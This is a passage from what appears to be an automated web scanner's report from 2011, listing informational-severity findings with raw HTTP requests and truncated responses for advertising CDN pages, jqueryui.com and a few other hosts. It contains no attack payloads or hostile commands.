Expires: Fri, 04 Feb 2011 21:43:26 GMT
Age: 994
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 97960

L=[["autos.aol.com/car-Volkswagen-az/",152],["autos.msn.com/browse/Volkswagen.aspx",152],["autos.yahoo.com/volkswagen/",152],["www.cars.com/volkswagen/",152],["www.edmunds.com/finder/make.volkswagen.h
...[SNIP]...

29.17. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_10.html

Request

GET /prod/ig/110121-160940_adv_10.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=9; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:46 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af75-140c7-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 12:55:15 GMT
Age: 32731
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 82119

L=[["losangeles.citysearch.com/profile/283437/valencia_ca/magic_mountain.html",2625],["media.universalorlando.com/",2625],["micechat.com/forums/other-theme-parks-destinations/118246-legoland-central-f
...[SNIP]...

29.18. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_2.html

Request

GET /prod/ig/110121-160940_adv_2.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=1; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:02 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af69-156ac-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 14:21:45 GMT
Age: 27497
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 87724

L=[["www.wowinsider.com/category/wrath-of-the-lich-king/",675],["www.wowwiki.com/",675],["www.wowwiki.com/Lich_King",675],["www.wowwiki.com/World_of_Warcraft:_Wrath_of_the_Lich_King",675],["www.zam.co
...[SNIP]...

29.19. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_3.html

Request

GET /prod/ig/110121-160940_adv_3.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=2; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:03 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af63-188d7-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 05:08:58 GMT
Age: 60665
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 100567

L=[["www.babycenter.com/0_supplementing-with-formula_8484.bc",791],["www.babycenter.com/baby-formula-feeding",791],["www.babycenter.com/choosing-and-using-baby-formula",791],["www.gerber.com/Articles/
...[SNIP]...

29.20. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_4.html

Request

GET /prod/ig/110121-160940_adv_4.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=3; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af56-16923-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 17:08:54 GMT
Age: 17470
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 92451

L=[["www.fordvehicles.com/suvs/escape/gallery/",835],["www.fordvehicles.com/suvs/escape/incentives/offers/results/index.asp?model=Escape&zip=90245&year=2009&planType=&referrer=www.ford.com",835],["www
...[SNIP]...

29.21. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_5.html

Request

GET /prod/ig/110121-160940_adv_5.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=4; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:38 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af4d-16544-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 04:50:53 GMT
Age: 61785
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 91460

L=[["www.automotive.com/2009/12/mazda/tribute/pricing/index.html",999],["www.automotive.com/2009/12/mazda/tribute/rebates/index.html",999],["www.automotive.com/2009/12/mazda/tribute/review/index.html"
...[SNIP]...

29.22. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_6.html

Request

GET /prod/ig/110121-160940_adv_6.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=5; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:39 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af3d-153db-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:50:41 GMT
Age: 7798
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 87003

L=[["www.cars.com/go/crp/research.jsp?makeid=1&modelid=8231&year=2010&myid=11421&acode=&mode=&aff=national&section=prices",1063],["www.cars.com/go/crp/research.jsp?makeid=1&modelid=8231&year=2010&myid
...[SNIP]...

29.23. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_7.html

Request

GET /prod/ig/110121-160940_adv_7.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=6; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:41 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af35-12a36-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 14:47:14 GMT
Age: 26007
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 76342

L=[["www.snagajob.com/job-seeker/jobs/statelist.aspx",1367],["|employer.snagajob.com/4easysteps/stepOne.aspx",1367],["eventful.com/saltlakecity/venues/stevenhenager-college-of-business-/V0-001-0002682
...[SNIP]...

29.24. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_8.html

Request

GET /prod/ig/110121-160940_adv_8.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=7; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af25-15f93-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 07:53:14 GMT
Age: 50848
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 90003

L=[["www.dealbase.com/Las-Vegas/Hard-Hotel-Casino-Vegas-deals-328",1699],["www.hotelscombined.com/hotel/hard_rock_hotel_las_vegas.htm",1699],["www.lasvegastourism.com/express_hardrock.htm",1699],["www
...[SNIP]...

29.25. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_9.html

Request

GET /prod/ig/110121-160940_adv_9.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=8; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:44 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af1b-13c6c-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 20:48:34 GMT
Age: 4330
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 81004

L=[["blogs.thecarconnection.com/marty-blog/1021387_2010-chevrolet-malibu-drops-hybrid-heres-why",1915],["autos.aol.com/cars-Nissan-Sentra-2010/expert-review",1916],["autos.aol.com/cars-Nissan-Sentra-2
...[SNIP]...

29.26. http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_ig.html

Request

GET /prod/ig/110121-160940_ig.html?pid=2331&plid=23663 HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:56 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af04-156-454e2940"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 13:11:52 GMT
Age: 31684
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:57 GMT
Connection: keep-alive
Content-Length: 342

<html>
<body>
<script type="text/javascript"> var pid=0, plid=0; try { var r = /pid=(\d*?)[&\s]+?plid=(\d*)/ig; var m = r.exec(window.location.search.substring(1)); if (m != null) {    pid = (m[1]) ? m[1
...[SNIP]...

29.27. http://core.videoegg.com/eap/12368/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/12368/html/jstags.html

Request

GET /eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "eae304da32ffc83f8aac123834882aa2:1292880706"
Last-Modified: Mon, 20 Dec 2010 21:16:26 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public
Content-Length: 1060

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...

29.28. http://fearthedevil.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fearthedevil.com
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: fearthedevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:18 GMT
Server: LiteSpeed
Connection: close
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.29. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1566767;type=apple663;cat=apple249;ord=3023932203650.4746? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 03 Feb 2011 17:46:52 GMT
Expires: Thu, 03 Feb 2011 17:46:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

29.30. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

29.31. http://jqueryui.com/themeroller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

